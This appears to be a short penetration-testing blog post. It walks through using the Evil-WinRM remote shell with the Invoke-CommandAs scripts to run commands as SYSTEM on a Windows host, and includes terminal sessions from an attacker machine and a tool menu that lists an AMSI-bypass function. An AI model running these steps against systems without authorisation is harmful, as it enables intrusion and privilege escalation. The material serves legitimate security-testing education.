Contents

Run as SYSTEM using Evil-WinRM

Contents

This is a quick blog post on how to elevate to SYSTEM without the need for PSEXEC when you are using PowerShell, or more specifcially in this case, PowerShell Remoting (WinRM).

First off, let me introduce my tool of choice here. It’s Evil-WinRM. I spoke about it in the Practical Exploitation video here: https://www.youtube.com/watch?v=tVgJ-9FJKxE, so I won’t go too far indepth. It’s essentially the only WinRM tool that I’ve found to work well in a non-Windows native situation (also you can proxy it through proxychains which is AWESOME!!).

Anyways.

I want to document how to run commands as SYSTEM without the use of PSEXEC. I found this technique on a 4sysops blog post called Running PowerShell Remotely As System with Invoke-CommandAs. Side-note you should definitely bookmark thier blog it’s great.

Invoke-CommandAs is not a native function of PowerShell, so you need to download it from the original author’s Github repo: https://github.com/mkellerman/Invoke-CommandAs

For our uses all you need to do is get these two particular files:

  1. https://github.com/mkellerman/Invoke-CommandAs/blob/master/Invoke-CommandAs/Public/Invoke-CommandAs.ps1
  2. https://github.com/mkellerman/Invoke-CommandAs/blob/master/Invoke-CommandAs/Private/Invoke-ScheduledTask.ps1

Here you can see me putting those two files into a scripts directory I made inside of the Evil-WinRM folder. (git clone https://github.com/Hackplayers/evil-winrm + bundle install)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
root@attacker:~/evil-winrm/scripts# ls
Invoke-CommandAs.ps1
root@attacker:~/evil-winrm/scripts# wget https://raw.githubusercontent.com/mkellerman/Invoke-CommandAs/master/Invoke-CommandAs/Private/Invoke-
--2020-09-13 20:17:56--  https://raw.githubusercontent.com/mkellerman/Invoke-CommandAs/master/Invoke-CommandAs/Private/Invoke-ScheduledTask.ps
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.200.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.200.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10009 (9.8K) [text/plain]
Saving to: 'Invoke-ScheduledTask.ps1'

Invoke-ScheduledTask.ps1                      100%[===========================================================================================

2020-09-13 20:17:56 (5.37 MB/s) - 'Invoke-ScheduledTask.ps1' saved [10009/10009]

Once that’s ready, I run Evil-WinRM with the -s flag and specify the scripts directory I put the two files in.

1
2
3
4
5
6
7
8
root@attacker:~/evil-winrm# ruby evil-winrm.rb -i 192.168.80.10 -u uberuser -s scripts/
Enter Password:

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\uberuser\Documents>

Once I have the shell I load each of the scripts by typing out their file names (tab complete should work)

1
2
*Evil-WinRM* PS C:\Users\uberuser\Documents> Invoke-ScheduledTask.ps1
*Evil-WinRM* PS C:\Users\uberuser\Documents> Invoke-CommandAs.ps1

Once they are loaded you need to run the menu command to load the functions into memory on the attackers side. I haven’t looked at the code enough to know exactly why this is needed, but it doesn’t seem to work if you don’t.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
*Evil-WinRM* PS C:\Users\uberuser\Documents> menu

   ,.   (   .      )               "            ,.   (   .      )       .
  ("  (  )  )'     ,'             (`     '`    ("     )  )'     ,'   .  ,)
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/
              By: CyberVaca, OscarAkaElvis, Laox @Hackplayers

[+] Bypass-4MSI
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Invoke-CommandAs
[+] Invoke-ScheduledTask

As we can see both of the needed functions are loaded and we can finally issue our commands as SYSTEM with the -AsSystem flag and the command being whoami:

1
2
3
*Evil-WinRM* PS C:\Users\uberuser\Documents> Invoke-CommandAs -ScriptBlock {whoami} -AsSystem
nt authority\system
*Evil-WinRM* PS C:\Users\uberuser\Documents>